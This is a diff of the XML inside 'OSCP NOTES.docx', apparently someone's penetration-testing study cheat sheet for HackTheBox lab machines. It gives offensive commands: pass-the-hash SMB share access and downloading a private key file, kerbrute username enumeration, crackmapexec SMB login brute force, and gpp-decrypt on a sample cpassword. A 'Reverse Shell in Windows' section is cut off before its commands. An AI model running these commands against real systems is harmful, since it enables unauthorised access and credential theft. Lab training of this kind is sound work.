-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>resolv.conf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> like: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>nameserver &lt;&lt;IP&gt;&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>k</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>erbrute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Enumerate Usernames</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbmap -u &lt;&lt;username&gt;&gt; -p ‘&lt;&lt;sambaNTP&gt;&gt;:&lt;&lt;sambaNTP&gt;&gt;’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -H </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>List Contents of Newly Found Share</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1541,53 +1304,82 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>./</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kerbrute_linux_amd64 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>userenum</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -d </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&lt;&lt;domain&gt;&gt; &lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>users_file</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;&gt;</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">smbmap -u &lt;&lt;username&gt;&gt; -p ‘&lt;&lt;sambaNTP&gt;&gt;:&lt;&lt;sambaNTP&gt;&gt;’ -H </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -R</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Download Newly Found File</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">smbmap -u &lt;&lt;username&gt;&gt; -p ‘&lt;&lt;sambaNTP&gt;&gt;:&lt;&lt;sambaNTP&gt;&gt;’ -H </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --download &lt;&lt;shareName&gt;&gt;/&lt;&lt;filename&gt;&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1619,73 +1411,517 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>./</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kerbrute_linux_amd64 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>userenum</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -d </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>fabricorp.local</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbmap -u alice1978 -p ‘0B13672F89372DBC:0B13672F89372DBC’ -H 10.10.10.107 --download alice/my_private_key.ppk</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DNS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Initial Setup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/etc/resolv.conf</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Add IP address to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">top of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/etc/resolv.conf like: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nameserver &lt;&lt;IP&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>erbrute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Enumerate Usernames</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">./kerbrute_linux_amd64 userenum -d </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;domain&gt;&gt; &lt;&lt;users_file&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e.g.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">./kerbrute_linux_amd64 userenum -d fabricorp.local </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>/root</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/Desktop/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>HackTheBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/fuse/users</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/Desktop/HackTheBox/fuse/users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cewl</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Get Words from Webpage</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cewl -d &lt;&lt;depth&gt;&gt; -m &lt;&lt;min-word-length&gt;&gt; --with-numbers -w cewl.out &lt;&lt;url&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e.g.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cewl -d 7 -m 8 --with-numbers -w cewl.out </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>http://fuse.fabricorp.out</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>crackmapexec</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Bruteforce SMB Login</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">crackmapexec smb &lt;&lt;IP&gt;&gt; -u &lt;&lt;users-file&gt;&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-p &lt;&lt;pass-file&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>gpp-decrypt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Got a cpassword?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">For example, within </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Groups.xml</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gpp-decrypt &lt;&lt;hash&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e.g.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">gpp-decrypt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -1703,7 +1939,7 @@
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2D9A21C2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="1AE8ACD8"/>
+    <w:tmpl w:val="04047F66"/>
     <w:lvl w:ilvl="0" w:tplc="0C090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>

--- a/OSCP NOTES.docx
+++ b/OSCP NOTES.docx
@@ -1924,6 +1924,548 @@
         <w:t>edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>svn</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>List all Items</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>svn ls svn://&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Look at Commit History</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>svn log svn://&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Checkout the Repo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>svn checkout svn://&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Change to Different Revision</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>svn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> up -r &lt;&lt;revision&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e.g.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>svn up -r 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Checkout Specific Revision</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>svn checkout svn://&lt;&lt;ip&gt;&gt; -r &lt;&lt;revision&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Reverse Shell in Windows</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Uploading nc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (assuming initial foothold)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
